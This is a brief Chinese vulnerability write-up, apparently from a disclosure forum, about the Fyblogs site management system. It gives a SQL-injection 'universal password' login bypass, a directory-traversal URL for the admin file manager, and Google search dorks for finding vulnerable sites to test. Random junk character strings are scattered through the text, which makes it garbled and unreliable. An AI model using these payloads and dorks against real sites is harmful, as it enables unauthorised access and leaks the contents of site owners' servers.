漏洞类型: 未授权访问/权限绕过
" a. X- Q! B% S+ i
, i8 @' w' u S* M9 r简要描述:0 f( G1 l5 T6 V
" q& \% X- |' M: u" \" }' n- xFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
8 m8 W3 ~ Z' F: H- c( Y" A; U6 \7 u% p+ H3 h8 h, ?
详细说明:
: V0 r" b( L6 F+ k) ~6 h; v
8 j4 Q1 p' x5 N, [后台万能密码 'or'='or') B$ B) V% o6 b+ j
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
( G$ E# l* x D+ M5 n4 k. o. Sadmin/uploadfile.asp?currentFolder=/upfiles/..// x) E1 _. \7 N: O7 E) `
( Z- m7 t+ X; B6 Q& J
漏洞证明:
) C8 o5 I+ J, F) l/ `8 M9 ^; Y$ `& |1 R- E' m
谷歌:inurl:type.asp?id=1 新闻中心 r0 y6 U4 _" [2 m: I: F
或者 :inurl:download_ok.asp?, V. }# p" h- J! l8 A7 V
$ k/ _3 z% u0 {& p" g: F
可以测试( E! v2 @, D9 Z/ p6 b' f) y
/ l- |5 l" o. a6 e9 `: x- h, `
1 e9 {( f9 L. ] |